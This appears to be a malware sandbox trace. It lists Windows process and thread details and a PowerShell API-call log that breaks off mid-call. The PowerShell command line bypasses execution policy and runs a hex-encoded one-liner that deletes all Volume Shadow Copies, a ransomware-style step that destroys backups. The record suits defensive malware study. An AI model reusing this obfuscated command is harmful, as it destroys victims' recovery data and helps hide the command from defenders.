os_tid = 0x74c Thread: id = 2422 os_tid = 0x2dc Thread: id = 2423 os_tid = 0x990 Thread: id = 2424 os_tid = 0xa14 Thread: id = 2425 os_tid = 0x670 Thread: id = 2426 os_tid = 0x43c Thread: id = 2427 os_tid = 0xa88 Thread: id = 2428 os_tid = 0x810 Thread: id = 2429 os_tid = 0x6f0 Thread: id = 2430 os_tid = 0x69c Thread: id = 2431 os_tid = 0x840 Thread: id = 2432 os_tid = 0x5cc Thread: id = 2433 os_tid = 0x67c Thread: id = 2434 os_tid = 0x3a4 Thread: id = 2435 os_tid = 0x330 Thread: id = 2436 os_tid = 0x7a8 Thread: id = 2437 os_tid = 0xa78 Thread: id = 2438 os_tid = 0x854 Thread: id = 2439 os_tid = 0x804 Thread: id = 2440 os_tid = 0x314 Thread: id = 2441 os_tid = 0xb0 Thread: id = 2442 os_tid = 0x78c Thread: id = 2443 os_tid = 0x4dc Thread: id = 2444 os_tid = 0x224 Thread: id = 2445 os_tid = 0x858 Thread: id = 2446 os_tid = 0x808 Thread: id = 2447 os_tid = 0xae4 Thread: id = 2448 os_tid = 0x8e0 Thread: id = 2449 os_tid = 0x240 Thread: id = 2450 os_tid = 0x688 Thread: id = 2451 os_tid = 0x790 Thread: id = 2452 os_tid = 0x7c4 Thread: id = 2453 os_tid = 0x1c0 Thread: id = 2454 os_tid = 0x73c Thread: id = 2455 os_tid = 0x7a0 Thread: id = 2456 os_tid = 0x6dc Thread: id = 2457 os_tid = 0x488 Thread: id = 2458 os_tid = 0x738 Thread: id = 2459 os_tid = 0xa54 Thread: id = 2460 os_tid = 0x760 Thread: id = 2461 os_tid = 0x388 Thread: id = 2462 os_tid = 0xa30 Thread: id = 2463 os_tid = 0xa64 Thread: id = 2464 os_tid = 0x708 Thread: id = 2465 os_tid = 0x700 Thread: id = 2466 os_tid = 0x8c0 Thread: id = 2467 os_tid = 0xa3c Thread: id = 2468 os_tid = 0x798 Thread: id = 2469 os_tid = 0x9f8 Thread: id = 2470 os_tid = 0x24c Thread: id = 2471 os_tid = 0x7d8 Thread: id = 2472 os_tid = 0x7d0 Thread: id = 2473 os_tid = 0xa68 Thread: id = 2474 os_tid = 0x690 Thread: id = 2475 os_tid = 0x614 Thread: id = 2476 os_tid = 0x5b4 Thread: id = 2477 os_tid = 0xbdc Thread: id = 2478 os_tid = 0xbe8 Thread: id = 2479 os_tid = 0xbd8 Thread: id = 2480 os_tid = 0x158 Thread: id = 2481 os_tid = 0xbd0 Thread: id = 2482 os_tid = 0x600 Thread: id = 2483 os_tid = 0xbe4 Thread: id = 2484 os_tid = 0x5d8 Thread: id = 2485 os_tid = 0x710 Thread: id = 2486 os_tid = 0x7f0 Thread: id = 2487 os_tid = 0x75c Thread: id = 2488 os_tid = 0x830 Thread: id = 2489 os_tid = 0x6cc Thread: id = 2490 os_tid = 0x3f8 Thread: id = 2491 os_tid = 0xbfc Thread: id = 2492 os_tid = 0x30c Thread: id = 2493 os_tid = 0x6b8 Thread: id = 2494 os_tid = 0xbec Thread: id = 2495 os_tid = 0x920 Thread: id = 2496 os_tid = 0x360 Thread: id = 2497 os_tid = 0x880 Thread: id = 2498 os_tid = 0x8f0 Thread: id = 2499 os_tid = 0xa18 Thread: id = 2500 os_tid = 0x8a0 Thread: id = 2501 os_tid = 0x870 Thread: id = 2502 os_tid = 0x2c4 Thread: id = 2503 os_tid = 0x890 Thread: id = 2504 os_tid = 0x4e8 Thread: id = 2505 os_tid = 0xcc Thread: id = 2506 os_tid = 0xd0 Thread: id = 2507 os_tid = 0xd4 Thread: id = 2508 os_tid = 0xd8 Thread: id = 2509 os_tid = 0xdc Thread: id = 2510 os_tid = 0xe0 Thread: id = 2511 os_tid = 0xe4 Thread: id = 2512 os_tid = 0xe8 Thread: id = 2513 os_tid = 0xec Thread: id = 2514 os_tid = 0x748 Thread: id = 2515 os_tid = 0xc4 Thread: id = 2516 os_tid = 0x620 Thread: id = 2517 os_tid = 0x910 Thread: id = 2518 os_tid = 0xc14 Thread: id = 2519 os_tid = 0xc10 Thread: id = 2520 os_tid = 0xc0c Thread: id = 2521 os_tid = 0xc08 Thread: id = 2522 os_tid = 0xc04 Thread: id = 2523 os_tid = 0x55c Thread: id = 2524 os_tid = 0x7a4 Thread: id = 2525 os_tid = 0x68c Thread: id = 2526 os_tid = 0x4e0 Thread: id = 2527 os_tid = 0x434 Thread: id = 2528 os_tid = 0x364 Thread: id = 2529 os_tid = 0x130 Thread: id = 2530 os_tid = 0xa60 Thread: id = 2531 os_tid = 0x99c Thread: id = 2532 os_tid = 0x6d8 Thread: id = 2533 os_tid = 0x92c Thread: id = 2534 os_tid = 0x8dc Thread: id = 2535 os_tid = 0x84c Thread: id = 2536 os_tid = 0x9c4 Thread: id = 2537 os_tid = 0x9e0 Thread: id = 2538 os_tid = 0x72c Thread: id = 2539 os_tid = 0xa10 Thread: id = 2540 os_tid = 0x980 Thread: id = 2541 os_tid = 0x940 Thread: id = 2542 os_tid = 0x950 Thread: id = 2543 os_tid = 0x950 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 9 os_tid = 0xb94 Thread: id = 10 os_tid = 0x644 Thread: id = 11 os_tid = 0x648 Thread: id = 12 os_tid = 0x768 Thread: id = 13 os_tid = 0x758 Thread: id = 14 os_tid = 0x724 Thread: id = 15 os_tid = 0x718 Thread: id = 16 os_tid = 0x714 Thread: id = 17 os_tid = 0x630 Thread: id = 18 os_tid = 0x154 Thread: id = 19 os_tid = 0x150 Thread: id = 20 os_tid = 0x120 Thread: id = 21 os_tid = 0x124 Thread: id = 22 os_tid = 0x118 Thread: id = 23 os_tid = 0xf0 Thread: id = 113 os_tid = 0x754 Thread: id = 2546 os_tid = 0xd04 Thread: id = 2592 os_tid = 0xd88 Thread: id = 2602 os_tid = 0xe10 Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 25 os_tid = 0xbb4 Thread: id = 26 os_tid = 0xbb8 Thread: id = 27 os_tid = 0xbc8 Thread: id = 28 os_tid = 0xbcc Thread: id = 29 os_tid = 0x40c Thread: id = 30 os_tid = 0x5dc Thread: id = 31 os_tid = 0x320 Thread: id = 32 os_tid = 0x6cc Thread: id = 33 os_tid = 0x42c Thread: id = 34 os_tid = 0x1e4 Thread: id = 35 os_tid = 0x760 Thread: id = 36 os_tid = 0x75c Thread: id = 37 os_tid = 0x74c Thread: id = 38 os_tid = 0x710 Thread: id = 39 os_tid = 0x6d0 Thread: id = 40 os_tid = 0x6bc Thread: id = 41 os_tid = 0x6b8 Thread: id = 42 os_tid = 0x6b0 Thread: id = 43 os_tid = 0x6a8 Thread: id = 44 os_tid = 0x69c Thread: id = 45 os_tid = 0x698 Thread: id = 46 os_tid = 0x688 Thread: id = 47 os_tid = 0x684 Thread: id = 48 os_tid = 0x678 Thread: id = 49 os_tid = 0x4a8 Thread: id = 50 os_tid = 0x46c Thread: id = 51 os_tid = 0x44c Thread: id = 52 os_tid = 0x424 Thread: id = 53 os_tid = 0x420 Thread: id = 54 os_tid = 0x41c Thread: id = 55 os_tid = 0x404 Thread: id = 56 os_tid = 0x14c Thread: id = 57 os_tid = 0x158 Thread: id = 58 os_tid = 0x3fc Thread: id = 59 os_tid = 0x3f4 Thread: id = 60 os_tid = 0x3e8 Thread: id = 61 os_tid = 0x39c Thread: id = 62 os_tid = 0x390 Thread: id = 63 os_tid = 0x38c Thread: id = 64 os_tid = 0x388 Thread: id = 65 os_tid = 0x37c Thread: id = 66 os_tid = 0x374 Thread: id = 67 os_tid = 0xa48 Thread: id = 68 os_tid = 0x360 Thread: id = 69 os_tid = 0xb90 Thread: id = 70 os_tid = 0x35c Thread: id = 71 os_tid = 0x358 Thread: id = 72 os_tid = 0x850 Thread: id = 73 os_tid = 0xc0 Thread: id = 74 os_tid = 0x90 Thread: id = 75 os_tid = 0x9d8 Thread: id = 103 os_tid = 0x990 Thread: id = 104 os_tid = 0xa88 Thread: id = 105 os_tid = 0xbe8 Thread: id = 121 os_tid = 0x900 Thread: id = 2158 os_tid = 0xa6c Thread: id = 2287 os_tid = 0xc78 Thread: id = 2288 os_tid = 0xc7c Thread: id = 2544 os_tid = 0xcfc Thread: id = 2545 os_tid = 0xd00 Thread: id = 2562 os_tid = 0xd08 Thread: id = 2563 os_tid = 0xd0c Thread: id = 2585 os_tid = 0xd14 Thread: id = 2586 os_tid = 0xd50 Thread: id = 2587 os_tid = 0xd54 Thread: id = 2588 os_tid = 0xd60 Thread: id = 2589 os_tid = 0xd70 Thread: id = 2603 os_tid = 0xe28 Process: id = "4" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x480a5000" os_pid = "0xb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x6fc" cmd_line = "powershell -ep bypass -c \"(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 76 os_tid = 0xa6c [0097.766] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0098.157] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0098.157] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0098.157] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0098.158] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0099.200] GetVersionExW (in: lpVersionInformation=0x1ad8c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ad8c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0099.201] GetVersionExW (in: lpVersionInformation=0x1ad8c0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ad8c0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0099.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0099.213] GetVersionExW (in: lpVersionInformation=0x1ad630*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ad630*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0099.214] SetErrorMode (uMode=0x1) returned 0x1 [0099.215] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ad790 | out: lpFileInformation=0x1ad790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0099.216] SetErrorMode (uMode=0x1) returned 0x1 [0099.219] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ada00 | out: lpdwHandle=0x1ada00) returned 0x94c [0099.220] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bb7160 | out: lpData=0x2bb7160) returned 1 [0099.225] VerQueryValueW (in: pBlock=0x2bb7160, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ad978, puLen=0x1ad970 | out: lplpBuffer=0x1ad978*=0x2bb71fc, puLen=0x1ad970) returned 1 [0099.228] lstrlenW (lpString="䅁") returned 1 [0099.239] VerQueryValueW (in: pBlock=0x2bb7160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ad8e8, puLen=0x1ad8e0 | out: lplpBuffer=0x1ad8e8*=0x2bb72d8, puLen=0x1ad8e0) returned 1 [0099.240] lstrlenW (lpString="Microsoft Corporation") returned 21 [0099.242] CoTaskMemAlloc (cb=0x2e) returned 0x2c50f0 [0099.242] lstrcpyW (in: lpString1=0x2c50f0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0099.244] CoTaskMemFree (pv=0x2c50f0) [0099.244] VerQueryValueW (in: pBlock=0x2bb7160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ad8e8, puLen=0x1ad8e0 | out: lplpBuffer=0x1ad8e8*=0x2bb732c, puLen=0x1ad8e0) returned 1 [0099.244] lstrlenW (lpString="System.Management.Automation") returned 28 [0099.244] CoTaskMemAlloc (cb=0x3c) returned 0x2c64f0 [0099.244] lstrcpyW (in: lpString1=0x2c64f0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0099.244] CoTaskMemFree (pv=0x2c64f0) [0099.244] VerQueryValueW (in: pBlock=0x2bb7160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ad8e8, puLen=0x1ad8e0 | out: lplpBuffer=0x1ad8e8*=0x2bb7388, puLen=0x1ad8e0) returned 1 [0099.244] lstrlenW (lpString="6.1.7601.17514") returned 14 [0099.244] CoTaskMemAlloc (cb=0x20) returned 0x2cbf60 [0099.244] lstrcpyW (in: lpString1=0x2cbf60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0099.244] CoTaskMemFree (pv=0x2cbf60) [0099.244] VerQueryValueW (in: pBlock=0x2bb7160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ad8e8, puLen=0x1ad8e0 | out: lplpBuffer=0x1ad8e8*=0x2bb73c8, puLen=0x1ad8e0) returned 1 [0099.244] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0099.244] CoTaskMemAlloc (cb=0x44) returned 0x2c64f0 [0099.244] lstrcpyW (in: lpString1=0x2c64f0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0099.244] CoTaskMemFree (pv=0x2c64f0) [0099.244] VerQueryValueW (in: pBlock=0x2bb7160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ad8e8, puLen=0x1ad8e0 | out: lplpBuffer=0x1ad8e8*=0x2bb7430, puLen=0x1ad8e0) returned 1 [0099.244] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0099.244] CoTaskMemAlloc (cb=0x76) returned 0x274710 [0099.244] lstrcpyW (in: lpString1=0x274710, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0099.244] CoTaskMemFree (pv=0x274710) [0099.244] VerQueryValueW (in: pBlock=0x2bb7160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ad8e8, puLen=0x1ad8e0 | out: lplpBuffer=0x1ad8e8*=0x2bb74cc, puLen=0x1ad8e0) returned 1 [0099.244] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0099.245] CoTaskMemAlloc (cb=0x44) returned 0x2c64f0 [0099.245] lstrcpyW (in: lpString1=0x2c64f0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0099.245] CoTaskMemFree (pv=0x2c64f0) [0099.245] VerQueryValueW (in: pBlock=0x2bb7160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ad8e8, puLen=0x1ad8e0 | out: lplpBuffer=0x1ad8e8*=0x2bb7530, puLen=0x1ad8e0) returned 1 [0099.245] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0099.245] CoTaskMemAlloc (cb=0x58) returned 0x22ab10 [0099.245] lstrcpyW (in: lpString1=0x22ab10, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0099.245] CoTaskMemFree (pv=0x22ab10) [0099.245] VerQueryValueW (in: pBlock=0x2bb7160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ad8e8, puLen=0x1ad8e0 | out: lplpBuffer=0x1ad8e8*=0x2bb75ac, puLen=0x1ad8e0) returned 1 [0099.245] lstrlenW (lpString="6.1.7601.17514") returned 14 [0099.245] CoTaskMemAlloc (cb=0x20) returned 0x2cbf60 [0099.245] lstrcpyW (in: lpString1=0x2cbf60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0099.245] CoTaskMemFree (pv=0x2cbf60) [0099.245] VerQueryValueW (in: pBlock=0x2bb7160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ad8e8, puLen=0x1ad8e0 | out: lplpBuffer=0x1ad8e8*=0x2bb7254, puLen=0x1ad8e0) returned 1 [0099.245] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0099.245] CoTaskMemAlloc (cb=0x66) returned 0x2480d0 [0099.245] lstrcpyW (in: lpString1=0x2480d0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0099.245] CoTaskMemFree (pv=0x2480d0) [0099.245] VerQueryValueW (in: pBlock=0x2bb7160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ad8e8, puLen=0x1ad8e0 | out: lplpBuffer=0x1ad8e8*=0x0, puLen=0x1ad8e0) returned 0 [0099.245] VerQueryValueW (in: pBlock=0x2bb7160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ad8e8, puLen=0x1ad8e0 | out: lplpBuffer=0x1ad8e8*=0x0, puLen=0x1ad8e0) returned 0 [0099.245] VerQueryValueW (in: pBlock=0x2bb7160, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ad8e8, puLen=0x1ad8e0 | out: lplpBuffer=0x1ad8e8*=0x0, puLen=0x1ad8e0) returned 0 [0099.245] VerQueryValueW (in: pBlock=0x2bb7160, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ad8b8, puLen=0x1ad8b0 | out: lplpBuffer=0x1ad8b8*=0x2bb71fc, puLen=0x1ad8b0) returned 1 [0099.247] CoTaskMemAlloc (cb=0x204) returned 0x26e420 [0099.247] VerLanguageNameW (in: wLang=0x0, szLang=0x26e420, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0099.247] CoTaskMemFree (pv=0x26e420) [0099.248] VerQueryValueW (in: pBlock=0x2bb7160, lpSubBlock="\\", lplpBuffer=0x1ad908, puLen=0x1ad900 | out: lplpBuffer=0x1ad908*=0x2bb7188, puLen=0x1ad900) returned 1 [0099.253] GetCurrentProcessId () returned 0xb0 [0099.271] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1ac830 | out: lpLuid=0x1ac830*(LowPart=0x14, HighPart=0)) returned 1 [0099.273] GetCurrentProcess () returned 0xffffffffffffffff [0099.274] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1ac850 | out: TokenHandle=0x1ac850*=0x2ec) returned 1 [0099.275] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2bba9d8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0099.277] CloseHandle (hObject=0x2ec) returned 1 [0099.282] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb0) returned 0x2ec [0099.292] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2bbaa40, cb=0x200, lpcbNeeded=0x1ad868 | out: lphModule=0x2bbaa40, lpcbNeeded=0x1ad868) returned 1 [0099.295] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13f300000, lpmodinfo=0x2bbacb0, cb=0x18 | out: lpmodinfo=0x2bbacb0*(lpBaseOfDll=0x13f300000, SizeOfImage=0x77000, EntryPoint=0x13f30c63c)) returned 1 [0099.296] CoTaskMemAlloc (cb=0x804) returned 0x2cdeb0 [0099.297] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13f300000, lpBaseName=0x2cdeb0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0099.297] CoTaskMemFree (pv=0x2cdeb0) [0099.298] CoTaskMemAlloc (cb=0x804) returned 0x2cdeb0 [0099.298] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13f300000, lpFilename=0x2cdeb0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0099.298] CoTaskMemFree (pv=0x2cdeb0) [0099.299] CloseHandle (hObject=0x2ec) returned 1 [0099.308] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xb0) returned 0x2ec [0099.309] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x1ad998 | out: lpExitCode=0x1ad998*=0x103) returned 1 [0099.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bbb088, Length=0x20000, ResultLength=0x1ad960 | out: SystemInformation=0x12bbb088, ResultLength=0x1ad960*=0x12470) returned 0x0 [0099.334] EnumWindows (lpEnumFunc=0x28266ac, lParam=0x0) returned 1 [0099.335] GetWindowThreadProcessId (in: hWnd=0x400e6, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.335] GetWindowThreadProcessId (in: hWnd=0x400ee, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.335] GetWindowThreadProcessId (in: hWnd=0x400c2, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.335] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x538 [0099.335] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x514 [0099.336] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.336] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x778 [0099.336] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x778 [0099.336] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.336] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.336] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.336] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.336] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.336] GetWindowThreadProcessId (in: 